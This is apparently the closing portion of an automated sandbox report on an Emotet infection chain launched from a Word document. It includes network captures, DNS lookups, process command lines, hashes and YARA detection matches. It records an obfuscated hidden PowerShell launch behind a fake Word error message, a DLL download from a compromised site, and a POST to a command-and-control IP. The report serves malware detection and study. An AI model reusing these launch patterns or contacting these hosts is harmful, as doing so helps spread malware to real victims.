Jan 6, 2021 08:57:41.577779055 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577794075 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577797890 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.577814102 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577822924 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.577833891 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577852011 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577867985 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.577868938 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577883959 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577899933 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577900887 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.577915907 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577931881 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577943087 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.577950954 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577969074 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577985048 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.577987909 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.578001022 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.578016043 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.578016996 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.578030109 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.578047037 CET  80           49167      176.53.69.151  192.168.2.22
Jan 6, 2021 08:57:41.578047037 CET  49167        80         192.168.2.22   176.53.69.151
Jan 6, 2021 08:57:41.578062057 CET  80           49167      176.53.69.151  192.168.2.22

                                            UDP Packets

Timestamp                           Source Port  Dest Port  Source IP      Dest IP
Jan 6, 2021 08:57:41.178471088 CET  52197        53         192.168.2.22   8.8.8.8
Jan 6, 2021 08:57:41.234630108 CET  53           52197      8.8.8.8        192.168.2.22

                                            DNS Queries

Timestamp                           Source IP      Dest IP   Trans ID  OP Code             Name          Type            Class
Jan 6, 2021 08:57:41.178471088 CET  192.168.2.22   8.8.8.8   0x70c0    Standard query (0)  petafilm.com  A (IP address)  IN (0x0001)

                                            DNS Answers

Timestamp                           Source IP  Dest IP       Trans ID  Reply Code    Name          CName  Address        Type            Class
Jan 6, 2021 08:57:41.234630108 CET  8.8.8.8    192.168.2.22  0x70c0    No error (0)  petafilm.com  -      176.53.69.151  A (IP address)  IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • petafilm.com
                                            • 5.2.136.90

                                            HTTP Packets

Session ID  Source IP      Source Port  Destination IP  Destination Port  Process
0           192.168.2.22   49167        176.53.69.151   80                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                           kBytes transferred  Direction  Data
Jan 6, 2021 08:57:41.325428963 CET  0                   OUT        GET /wp-admin/4m/ HTTP/1.1
                                            Host: petafilm.com
                                            Connection: Keep-Alive
Jan 6, 2021 08:57:41.428926945 CET  1                   IN         HTTP/1.1 200 OK
                                            Cache-Control: no-cache, must-revalidate
                                            Pragma: no-cache
                                            Content-Type: application/octet-stream
                                            Expires: Wed, 06 Jan 2021 07:57:52 GMT
                                            Last-Modified: Wed, 06 Jan 2021 07:57:52 GMT
                                            Server: Microsoft-IIS/10.0
                                            Set-Cookie: 5ff56d802ad3f=1609919872; expires=Wed, 06-Jan-2021 07:58:52 GMT; Max-Age=60; path=/
                                            Content-Disposition: attachment; filename="bLH.dll"
                                            Content-Transfer-Encoding: binary
                                            X-Powered-By: ASP.NET
                                            X-Powered-By-Plesk: PleskWin
                                            Date: Wed, 06 Jan 2021 07:57:51 GMT
                                            Content-Length: 192000


Session ID  Source IP      Source Port  Destination IP  Destination Port  Process
1           192.168.2.22   49168        5.2.136.90      80                C:\Windows\SysWOW64\rundll32.exe

Timestamp                           kBytes transferred  Direction  Data
Jan 6, 2021 08:57:58.728990078 CET  200                 OUT        POST /6d6v7rdk92yimvk/99aw7ok625toqmkhj7c/ HTTP/1.1
                                            DNT: 0
                                            Referer: 5.2.136.90/6d6v7rdk92yimvk/99aw7ok625toqmkhj7c/
                                            Content-Type: multipart/form-data; boundary=-------------------g8UsT9LwY8y8blrgAXk
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                            Host: 5.2.136.90
                                            Content-Length: 6100
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
Jan 6, 2021 08:57:59.362884998 CET  208                 IN         HTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Wed, 06 Jan 2021 07:57:59 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Vary: Accept-Encoding


                                            Code Manipulations

                                            Statistics

                                            Behavior


                                            System Behavior

                                            General

                                            Start time:08:57:39
                                            Start date:06/01/2021
                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                            Imagebase:0x13fd60000
                                            File size:1424032 bytes
                                            MD5 hash:95C38D04597050285A18F66039EDB456
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:08:57:41
                                            Start date:06/01/2021
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
                                            Imagebase:0x4a190000
                                            File size:345088 bytes
                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Start time:08:57:42
                                            Start date:06/01/2021
                                            Path:C:\Windows\System32\msg.exe
                                            Wow64 process (32bit):false
                                            Commandline:msg user /v Word experienced an error trying to open the file.
                                            Imagebase:0xff400000
                                            File size:26112 bytes
                                            MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Start time:08:57:42
                                            Start date:06/01/2021
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:POwersheLL -w hidden -ENCOD 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
                                            Imagebase:0x13fb80000
                                            File size:473600 bytes
                                            MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2096562119.0000000000296000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2096633057.0000000001B66000.00000004.00000001.sdmp, Author: Florian Roth
                                            Reputation:high

                                            General

                                            Start time:08:57:45
                                            Start date:06/01/2021
                                            Path:C:\Windows\System32\rundll32.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                                            Imagebase:0xffb30000
                                            File size:45568 bytes
                                            MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Start time:08:57:45
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2099273377.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2099440995.0000000000221000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:08:57:46
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cgjbbwbf\qqtudgd.huj',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2100654563.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2100698593.0000000000251000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:08:57:46
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nkqiqdbodnub\wtlcjwyiszo.kcs',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2101721678.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2101746597.00000000001D1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:08:57:47
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zersybwlygjod\ujnaefcctevs.wag',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2103683744.00000000001E1000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2103560548.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:08:57:48
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gocmtvldv\plpbjoam.bfk',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2105305860.00000000001E1000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2105231881.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:08:57:48
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uyxqa\ucgv.gdq',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2106388395.0000000000221000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2106314094.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:08:57:49
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nxixsue\ekwnwx.zgx',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2107874642.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2108018320.00000000001E1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:08:57:50
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgjjq\jcse.fro',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2109151387.0000000000221000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2109044611.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:08:57:50
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kggdchrkalohz\pkgboheoanvf.hox',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2110616410.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2110668347.0000000000281000.00000020.00000001.sdmp, Author: Joe Security

                                            General

                                            Start time:08:57:51
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jhnbwsyvosmob\uzkhbqpbyyqm.xoq',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2112015647.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2112073559.0000000000221000.00000020.00000001.sdmp, Author: Joe Security

                                            General

                                            Start time:08:57:52
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ulduktzjxplnmpb\xnnmpmxkpltkbl.ghw',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2113027910.0000000000231000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2112967165.0000000000210000.00000040.00000001.sdmp, Author: Joe Security

                                            General

                                            Start time:08:57:52
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ohslgtw\xeprri.cyh',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2114668618.00000000006E0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2114707003.0000000000701000.00000020.00000001.sdmp, Author: Joe Security

                                            General

                                            Start time:08:57:53
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Adumhgbkvoz\tdxrpdrtbm.quu',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2116945153.0000000000290000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2117172638.0000000000301000.00000020.00000001.sdmp, Author: Joe Security

                                            General

                                            Start time:08:57:53
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fnniqydokod\xeqkvdqlhe.bce',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2119170548.0000000000291000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2119062368.0000000000270000.00000040.00000001.sdmp, Author: Joe Security

                                            General

                                            Start time:08:57:54
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wpjypezem\yvgznbmd.qnx',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000015.00000002.2351272233.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000015.00000002.2351339088.00000000001F1000.00000020.00000001.sdmp, Author: Joe Security

                                            Disassembly

                                            Code Analysis
